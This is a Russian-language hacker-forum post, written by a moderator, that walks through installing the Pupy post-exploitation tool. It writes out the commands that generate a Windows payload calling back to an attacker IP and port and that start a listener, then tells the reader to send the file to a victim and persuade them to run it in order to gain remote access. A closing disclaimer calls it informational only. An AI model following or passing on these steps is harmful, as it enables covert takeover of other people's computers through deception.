Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили форум хакеров.

bbc_Hash

Модератор
Команда форума
Пользователь
Регистрация
8 Янв 2019
Сообщения
527
Реакции
71
Баллы
118
[SIZE=13.5pt]Pupy[/SIZE][SIZE=13.5pt] — это кросс-платформенный многофункциональный инструмент для пост-эксплуатации, написанный на python. С помощь данного инструмента злоумышленник может получить удаленный доступ к компьютеру под управлением ОС Windows или Linux.[/SIZE]

[SIZE=21pt]Установка инструмента[/SIZE]
[SIZE=13.5pt]Открываем терминал и вводим команду для обновления пакетов:[/SIZE]

[SIZE=12pt]apt-get update && apt-get upgrade[/SIZE]

[SIZE=13.5pt]Устанавливаем[/SIZE] [SIZE=13.5pt]все[/SIZE] [SIZE=13.5pt]необходимые[/SIZE] [SIZE=13.5pt]библиотеки[/SIZE][SIZE=13.5pt]:[/SIZE]

[SIZE=12pt]sudo apt-get install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv[/SIZE]

[SIZE=13.5pt]Клонируем репозиторий инструмента с GitHub:[/SIZE]

[SIZE=12pt]git clone https://github.com/n1nj4sec/pupy[/SIZE]

[SIZE=13.5pt]Переходим в директорию:[/SIZE]

[SIZE=12pt]cd pupy[/SIZE]

[SIZE=13.5pt]Делаем скрипт установки исполняемым и запускаем:[/SIZE]

[SIZE=12pt]chmod +x ./install.sh[/SIZE]

[SIZE=12pt]./install.sh[/SIZE]

[SIZE=13.5pt]Ожидаем окончание процесса установки.[/SIZE]

[SIZE=21pt]Эксплуатация инструмента[/SIZE]

[SIZE=13.5pt]После того, как установка будет завершена, запускаем инструмент:[/SIZE]

[SIZE=12pt]cd pupy[/SIZE]

[SIZE=12pt]python pupysh.py[/SIZE]

[SIZE=13.5pt]Допустим, атакующий компьютер имеет IP-адрес 132.174.12.162 и порт 43210. Нам нужно взломать компьютер под управлением ОС Windows x64. В таком случае команда для создания вредоносного файла будет выглядеть так:[/SIZE]

[SIZE=12pt]gen -f client -O windows -A x64 connect --host 132.174.12.162:43210 -t http[/SIZE]

[SIZE=13.5pt]После выполнения данной команды в терминале появится полный путь к вредоносному файлу. Но перед тем, как отправить вредоносный файл нашей жертве, мы должны создать слушатель с помощью следующей команды:[/SIZE]

[SIZE=12pt]listen -a http 43210[/SIZE]

[SIZE=13.5pt], где http — метод доставки полезной нагрузки, а 43210 — открытый порт на атакующем компьютере.[/SIZE]
[SIZE=13.5pt]Теперь осталось только оправить нашей жертве ранее созданный вредоносный файл, и уговорить нашу жертву запустить данный файл. Если файл будет запущен жертвой, то мы получим удаленный доступ к компьютеру жертвы.[/SIZE]

[SIZE=16pt]Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.[/SIZE]
 
Яндекс.Метрика